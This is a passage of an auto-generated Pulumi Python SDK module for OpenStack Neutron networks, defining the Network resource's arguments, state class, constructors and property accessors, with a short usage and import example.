:param pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]] segments: An array of one or more provider segment objects. :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network. :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options. """ if admin_state_up is not None: pulumi.set(__self__, "admin_state_up", admin_state_up) if availability_zone_hints is not None: pulumi.set(__self__, "availability_zone_hints", availability_zone_hints) if description is not None: pulumi.set(__self__, "description", description) if dns_domain is not None: pulumi.set(__self__, "dns_domain", dns_domain) if external is not None: pulumi.set(__self__, "external", external) if mtu is not None: pulumi.set(__self__, "mtu", mtu) if name is not None: pulumi.set(__self__, "name", name) if port_security_enabled is not None: pulumi.set(__self__, "port_security_enabled", port_security_enabled) if qos_policy_id is not None: pulumi.set(__self__, "qos_policy_id", qos_policy_id) if region is not None: pulumi.set(__self__, "region", region) if segments is not None: pulumi.set(__self__, "segments", segments) if shared is not None: pulumi.set(__self__, "shared", shared) if tags is not None: pulumi.set(__self__, "tags", tags) if tenant_id is not None: pulumi.set(__self__, "tenant_id", tenant_id) if transparent_vlan is not None: pulumi.set(__self__, "transparent_vlan", transparent_vlan) if value_specs is not None: pulumi.set(__self__, "value_specs", value_specs) @property @pulumi.getter(name="adminStateUp") def admin_state_up(self) -> Optional[pulumi.Input[bool]]: """ The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. """ return pulumi.get(self, "admin_state_up") @admin_state_up.setter def admin_state_up(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "admin_state_up", value) @property @pulumi.getter(name="availabilityZoneHints") def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. """ return pulumi.get(self, "availability_zone_hints") @availability_zone_hints.setter def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "availability_zone_hints", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Human-readable description of the network. Changing this updates the name of the existing network. 
""" return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="dnsDomain") def dns_domain(self) -> Optional[pulumi.Input[str]]: """ The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. """ return pulumi.get(self, "dns_domain") @dns_domain.setter def dns_domain(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "dns_domain", value) @property @pulumi.getter def external(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. """ return pulumi.get(self, "external") @external.setter def external(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "external", value) @property @pulumi.getter def mtu(self) -> Optional[pulumi.Input[int]]: """ The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. """ return pulumi.get(self, "mtu") @mtu.setter def mtu(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "mtu", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="portSecurityEnabled") def port_security_enabled(self) -> Optional[pulumi.Input[bool]]: """ Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. """ return pulumi.get(self, "port_security_enabled") @port_security_enabled.setter def port_security_enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "port_security_enabled", value) @property @pulumi.getter(name="qosPolicyId") def qos_policy_id(self) -> Optional[pulumi.Input[str]]: """ Reference to the associated QoS policy. """ return pulumi.get(self, "qos_policy_id") @qos_policy_id.setter def qos_policy_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "qos_policy_id", value) @property @pulumi.getter def region(self) -> Optional[pulumi.Input[str]]: """ The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. """ return pulumi.get(self, "region") @region.setter def region(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "region", value) @property @pulumi.getter def segments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]: """ An array of one or more provider segment objects. 
""" return pulumi.get(self, "segments") @segments.setter def segments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]): pulumi.set(self, "segments", value) @property @pulumi.getter def shared(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. """ return pulumi.get(self, "shared") @shared.setter def shared(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "shared", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A set of string tags for the network. """ return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tenantId") def tenant_id(self) -> Optional[pulumi.Input[str]]: """ The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. """ return pulumi.get(self, "tenant_id") @tenant_id.setter def tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenant_id", value) @property @pulumi.getter(name="transparentVlan") def transparent_vlan(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. """ return pulumi.get(self, "transparent_vlan") @transparent_vlan.setter def transparent_vlan(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "transparent_vlan", value) @property @pulumi.getter(name="valueSpecs") def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ Map of additional options. """ return pulumi.get(self, "value_specs") @value_specs.setter def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "value_specs", value) @pulumi.input_type class _NetworkState: def __init__(__self__, *, admin_state_up: Optional[pulumi.Input[bool]] = None, all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None): """ Input properties used for looking up and filtering Network resources. :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the network, which have been explicitly and implicitly added. 
:param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the name of the existing network. :param pulumi.Input[str] dns_domain: The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. :param pulumi.Input[int] mtu: The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network. :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy. :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. :param pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]] segments: An array of one or more provider segment objects. :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network. :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options. 
""" if admin_state_up is not None: pulumi.set(__self__, "admin_state_up", admin_state_up) if all_tags is not None: pulumi.set(__self__, "all_tags", all_tags) if availability_zone_hints is not None: pulumi.set(__self__, "availability_zone_hints", availability_zone_hints) if description is not None: pulumi.set(__self__, "description", description) if dns_domain is not None: pulumi.set(__self__, "dns_domain", dns_domain) if external is not None: pulumi.set(__self__, "external", external) if mtu is not None: pulumi.set(__self__, "mtu", mtu) if name is not None: pulumi.set(__self__, "name", name) if port_security_enabled is not None: pulumi.set(__self__, "port_security_enabled", port_security_enabled) if qos_policy_id is not None: pulumi.set(__self__, "qos_policy_id", qos_policy_id) if region is not None: pulumi.set(__self__, "region", region) if segments is not None: pulumi.set(__self__, "segments", segments) if shared is not None: pulumi.set(__self__, "shared", shared) if tags is not None: pulumi.set(__self__, "tags", tags) if tenant_id is not None: pulumi.set(__self__, "tenant_id", tenant_id) if transparent_vlan is not None: pulumi.set(__self__, "transparent_vlan", transparent_vlan) if value_specs is not None: pulumi.set(__self__, "value_specs", value_specs) @property @pulumi.getter(name="adminStateUp") def admin_state_up(self) -> Optional[pulumi.Input[bool]]: """ The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network. """ return pulumi.get(self, "admin_state_up") @admin_state_up.setter def admin_state_up(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "admin_state_up", value) @property @pulumi.getter(name="allTags") def all_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ The collection of tags assigned on the network, which have been explicitly and implicitly added. """ return pulumi.get(self, "all_tags") @all_tags.setter def all_tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "all_tags", value) @property @pulumi.getter(name="availabilityZoneHints") def availability_zone_hints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network. """ return pulumi.get(self, "availability_zone_hints") @availability_zone_hints.setter def availability_zone_hints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "availability_zone_hints", value) @property @pulumi.getter def description(self) -> Optional[pulumi.Input[str]]: """ Human-readable description of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "description") @description.setter def description(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "description", value) @property @pulumi.getter(name="dnsDomain") def dns_domain(self) -> Optional[pulumi.Input[str]]: """ The network DNS domain. Available, when Neutron DNS extension is enabled. The `dns_domain` of a network in conjunction with the `dns_name` attribute of its ports will be published in an external DNS service when Neutron is configured to integrate with such a service. 
""" return pulumi.get(self, "dns_domain") @dns_domain.setter def dns_domain(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "dns_domain", value) @property @pulumi.getter def external(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network. """ return pulumi.get(self, "external") @external.setter def external(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "external", value) @property @pulumi.getter def mtu(self) -> Optional[pulumi.Input[int]]: """ The network MTU. Available for read-only, when Neutron `net-mtu` extension is enabled. Available for the modification, when Neutron `net-mtu-writable` extension is enabled. """ return pulumi.get(self, "mtu") @mtu.setter def mtu(self, value: Optional[pulumi.Input[int]]): pulumi.set(self, "mtu", value) @property @pulumi.getter def name(self) -> Optional[pulumi.Input[str]]: """ The name of the network. Changing this updates the name of the existing network. """ return pulumi.get(self, "name") @name.setter def name(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "name", value) @property @pulumi.getter(name="portSecurityEnabled") def port_security_enabled(self) -> Optional[pulumi.Input[bool]]: """ Whether to explicitly enable or disable port security on the network. Port Security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`. """ return pulumi.get(self, "port_security_enabled") @port_security_enabled.setter def port_security_enabled(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "port_security_enabled", value) @property @pulumi.getter(name="qosPolicyId") def qos_policy_id(self) -> Optional[pulumi.Input[str]]: """ Reference to the associated QoS policy. """ return pulumi.get(self, "qos_policy_id") @qos_policy_id.setter def qos_policy_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "qos_policy_id", value) @property @pulumi.getter def region(self) -> Optional[pulumi.Input[str]]: """ The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network. """ return pulumi.get(self, "region") @region.setter def region(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "region", value) @property @pulumi.getter def segments(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]: """ An array of one or more provider segment objects. """ return pulumi.get(self, "segments") @segments.setter def segments(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NetworkSegmentArgs']]]]): pulumi.set(self, "segments", value) @property @pulumi.getter def shared(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network. """ return pulumi.get(self, "shared") @shared.setter def shared(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "shared", value) @property @pulumi.getter def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]: """ A set of string tags for the network. 
""" return pulumi.get(self, "tags") @tags.setter def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]): pulumi.set(self, "tags", value) @property @pulumi.getter(name="tenantId") def tenant_id(self) -> Optional[pulumi.Input[str]]: """ The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network. """ return pulumi.get(self, "tenant_id") @tenant_id.setter def tenant_id(self, value: Optional[pulumi.Input[str]]): pulumi.set(self, "tenant_id", value) @property @pulumi.getter(name="transparentVlan") def transparent_vlan(self) -> Optional[pulumi.Input[bool]]: """ Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network. """ return pulumi.get(self, "transparent_vlan") @transparent_vlan.setter def transparent_vlan(self, value: Optional[pulumi.Input[bool]]): pulumi.set(self, "transparent_vlan", value) @property @pulumi.getter(name="valueSpecs") def value_specs(self) -> Optional[pulumi.Input[Mapping[str, Any]]]: """ Map of additional options. """ return pulumi.get(self, "value_specs") @value_specs.setter def value_specs(self, value: Optional[pulumi.Input[Mapping[str, Any]]]): pulumi.set(self, "value_specs", value) class Network(pulumi.CustomResource): @overload def __init__(__self__, resource_name: str, opts: Optional[pulumi.ResourceOptions] = None, admin_state_up: Optional[pulumi.Input[bool]] = None, availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, description: Optional[pulumi.Input[str]] = None, dns_domain: Optional[pulumi.Input[str]] = None, external: Optional[pulumi.Input[bool]] = None, mtu: Optional[pulumi.Input[int]] = None, name: Optional[pulumi.Input[str]] = None, port_security_enabled: Optional[pulumi.Input[bool]] = None, qos_policy_id: Optional[pulumi.Input[str]] = None, region: Optional[pulumi.Input[str]] = None, segments: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]]] = None, shared: Optional[pulumi.Input[bool]] = None, tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None, tenant_id: Optional[pulumi.Input[str]] = None, transparent_vlan: Optional[pulumi.Input[bool]] = None, value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None, __props__=None): """ Manages a V2 Neutron network resource within OpenStack. ## Example Usage ```python import pulumi import pulumi_openstack as openstack network1 = openstack.networking.Network("network1", admin_state_up=True) subnet1 = openstack.networking.Subnet("subnet1", cidr="192.168.199.0/24", ip_version=4, network_id=network1.id) secgroup1 = openstack.compute.SecGroup("secgroup1", description="a security group", rules=[openstack.compute.SecGroupRuleArgs( cidr="0.0.0.0/0", from_port=22, ip_protocol="tcp", to_port=22, )]) port1 = openstack.networking.Port("port1", admin_state_up=True, fixed_ips=[openstack.networking.PortFixedIpArgs( ip_address="192.168.199.10", subnet_id=subnet1.id, )], network_id=network1.id, security_group_ids=[secgroup1.id]) instance1 = openstack.compute.Instance("instance1", networks=[openstack.compute.InstanceNetworkArgs( port=port1.id, )], security_groups=[secgroup1.name]) ``` ## Import Networks can be imported using the `id`, e.g. ```sh $ pulumi import openstack:networking/network:Network network_1 d90ce693-5ccf-4136-a0ed-152ce412b6b9 ``` :param str resource_name: The name of the resource. 
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network.
        :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the description of the existing network.
        :param pulumi.Input[str] dns_domain: The network DNS domain. Available when the Neutron DNS extension is enabled. The `dns_domain` of a network, in conjunction with the `dns_name` attribute of its ports, will be published in an external DNS service when Neutron is configured to integrate with such a service.
        :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network.
        :param pulumi.Input[int] mtu: The network MTU. Read-only when the Neutron `net-mtu` extension is enabled; modifiable when the Neutron `net-mtu-writable` extension is enabled.
        :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network.
        :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`.
        :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
        :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]] segments: An array of one or more provider segment objects.
        :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network.
        :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network.
        :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network.
        :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: Optional[NetworkArgs] = None,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Manages a V2 Neutron network resource within OpenStack.

        ## Example Usage

        ```python
        import pulumi
        import pulumi_openstack as openstack

        network1 = openstack.networking.Network("network1", admin_state_up=True)
        subnet1 = openstack.networking.Subnet("subnet1",
            cidr="192.168.199.0/24",
            ip_version=4,
            network_id=network1.id)
        secgroup1 = openstack.compute.SecGroup("secgroup1",
            description="a security group",
            rules=[openstack.compute.SecGroupRuleArgs(
                cidr="0.0.0.0/0",
                from_port=22,
                ip_protocol="tcp",
                to_port=22,
            )])
        port1 = openstack.networking.Port("port1",
            admin_state_up=True,
            fixed_ips=[openstack.networking.PortFixedIpArgs(
                ip_address="192.168.199.10",
                subnet_id=subnet1.id,
            )],
            network_id=network1.id,
            security_group_ids=[secgroup1.id])
        instance1 = openstack.compute.Instance("instance1",
            networks=[openstack.compute.InstanceNetworkArgs(
                port=port1.id,
            )],
            security_groups=[secgroup1.name])
        ```

        ## Import

        Networks can be imported using the `id`, e.g.

        ```sh
         $ pulumi import openstack:networking/network:Network network_1 d90ce693-5ccf-4136-a0ed-152ce412b6b9
        ```

        :param str resource_name: The name of the resource.
        :param NetworkArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        resource_args, opts = _utilities.get_resource_args_opts(NetworkArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 admin_state_up: Optional[pulumi.Input[bool]] = None,
                 availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 dns_domain: Optional[pulumi.Input[str]] = None,
                 external: Optional[pulumi.Input[bool]] = None,
                 mtu: Optional[pulumi.Input[int]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 port_security_enabled: Optional[pulumi.Input[bool]] = None,
                 qos_policy_id: Optional[pulumi.Input[str]] = None,
                 region: Optional[pulumi.Input[str]] = None,
                 segments: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]]] = None,
                 shared: Optional[pulumi.Input[bool]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                 tenant_id: Optional[pulumi.Input[str]] = None,
                 transparent_vlan: Optional[pulumi.Input[bool]] = None,
                 value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = NetworkArgs.__new__(NetworkArgs)

            __props__.__dict__["admin_state_up"] = admin_state_up
            __props__.__dict__["availability_zone_hints"] = availability_zone_hints
            __props__.__dict__["description"] = description
            __props__.__dict__["dns_domain"] = dns_domain
            __props__.__dict__["external"] = external
            __props__.__dict__["mtu"] = mtu
            __props__.__dict__["name"] = name
            __props__.__dict__["port_security_enabled"] = port_security_enabled
            __props__.__dict__["qos_policy_id"] = qos_policy_id
            __props__.__dict__["region"] = region
            __props__.__dict__["segments"] = segments
            __props__.__dict__["shared"] = shared
            __props__.__dict__["tags"] = tags
            __props__.__dict__["tenant_id"] = tenant_id
            __props__.__dict__["transparent_vlan"] = transparent_vlan
            __props__.__dict__["value_specs"] = value_specs
            __props__.__dict__["all_tags"] = None
        super(Network, __self__).__init__(
            'openstack:networking/network:Network',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            admin_state_up: Optional[pulumi.Input[bool]] = None,
            all_tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            availability_zone_hints: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            description: Optional[pulumi.Input[str]] = None,
            dns_domain: Optional[pulumi.Input[str]] = None,
            external: Optional[pulumi.Input[bool]] = None,
            mtu: Optional[pulumi.Input[int]] = None,
            name: Optional[pulumi.Input[str]] = None,
            port_security_enabled: Optional[pulumi.Input[bool]] = None,
            qos_policy_id: Optional[pulumi.Input[str]] = None,
            region: Optional[pulumi.Input[str]] = None,
            segments: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]]] = None,
            shared: Optional[pulumi.Input[bool]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
            tenant_id: Optional[pulumi.Input[str]] = None,
            transparent_vlan: Optional[pulumi.Input[bool]] = None,
            value_specs: Optional[pulumi.Input[Mapping[str, Any]]] = None) -> 'Network':
        """
        Get an existing Network resource's state with the given name, id, and optional
        extra properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[bool] admin_state_up: The administrative state of the network. Acceptable values are "true" and "false". Changing this value updates the state of the existing network.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] all_tags: The collection of tags assigned on the network, which have been explicitly and implicitly added.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] availability_zone_hints: An availability zone is used to make network resources highly available. Used for resources with high availability so that they are scheduled on different availability zones. Changing this creates a new network.
        :param pulumi.Input[str] description: Human-readable description of the network. Changing this updates the description of the existing network.
        :param pulumi.Input[str] dns_domain: The network DNS domain. Available when the Neutron DNS extension is enabled. The `dns_domain` of a network, in conjunction with the `dns_name` attribute of its ports, will be published in an external DNS service when Neutron is configured to integrate with such a service.
        :param pulumi.Input[bool] external: Specifies whether the network resource has the external routing facility. Valid values are true and false. Defaults to false. Changing this updates the external attribute of the existing network.
        :param pulumi.Input[int] mtu: The network MTU. Read-only when the Neutron `net-mtu` extension is enabled; modifiable when the Neutron `net-mtu-writable` extension is enabled.
        :param pulumi.Input[str] name: The name of the network. Changing this updates the name of the existing network.
        :param pulumi.Input[bool] port_security_enabled: Whether to explicitly enable or disable port security on the network. Port security is usually enabled by default, so omitting this argument will usually result in a value of "true". Setting this explicitly to `false` will disable port security. Valid values are `true` and `false`.
        :param pulumi.Input[str] qos_policy_id: Reference to the associated QoS policy.
        :param pulumi.Input[str] region: The region in which to obtain the V2 Networking client. A Networking client is needed to create a Neutron network. If omitted, the `region` argument of the provider is used. Changing this creates a new network.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkSegmentArgs']]]] segments: An array of one or more provider segment objects.
        :param pulumi.Input[bool] shared: Specifies whether the network resource can be accessed by any tenant or not. Changing this updates the sharing capabilities of the existing network.
        :param pulumi.Input[Sequence[pulumi.Input[str]]] tags: A set of string tags for the network.
        :param pulumi.Input[str] tenant_id: The owner of the network. Required if admin wants to create a network for another tenant. Changing this creates a new network.
        :param pulumi.Input[bool] transparent_vlan: Specifies whether the network resource has the VLAN transparent attribute set. Valid values are true and false. Defaults to false. Changing this updates the `transparent_vlan` attribute of the existing network.
        :param pulumi.Input[Mapping[str, Any]] value_specs: Map of additional options.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        __props__ = _NetworkState.__new__(_NetworkState)

        __props__.__dict__["admin_state_up"] = admin_state_up
        __props__.__dict__["all_tags"] = all_tags
        __props__.__dict__["availability_zone_hints"] = availability_zone_hints
        __props__.__dict__["description"] = description
        __props__.__dict__["dns_domain"] = dns_domain
        __props__.__dict__["external"] = external
        __props__.__dict__["mtu"] = mtu
        __props__.__dict__["name"] = name
        __props__.__dict__["port_security_enabled"] = port_security_enabled
        __props__.__dict__["qos_policy_id"] = qos_policy_id
        __props__.__dict__["region"] = region
        __props__.__dict__["segments"] = segments
        __props__.__dict__["shared"] = shared
        __props__.__dict__["tags"] = tags
        __props__.__dict__["tenant_id"] = tenant_id
        __props__.__dict__["transparent_vlan"] = transparent_vlan
        __props__.__dict__["value_specs"] = value_specs
        return Network(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="adminStateUp")
    def admin_state_up(self) -> pulumi.Output[bool]:
        """
        The administrative state of the network. Acceptable values are "true" and
        "false". Changing this value updates the state of the existing network.
        """
        return pulumi.get(self, "admin_state_up")

    @property
    @pulumi.getter(name="allTags")
    def all_tags(self) -> pulumi.Output[Sequence[str]]:
        """
        The collection of tags assigned on the network, which have been explicitly
        and implicitly added.
        """
        return pulumi.get(self, "all_tags")

    @property
    @pulumi.getter(name="availabilityZoneHints")
    def availability_zone_hints(self) -> pulumi.Output[Sequence[str]]:
        """
        An availability zone is used to make network resources highly available.
        Used for resources with high availability so that they are scheduled on
        different availability zones. Changing this creates a new network.
        """
        return pulumi.get(self, "availability_zone_hints")

    @property
    @pulumi.getter
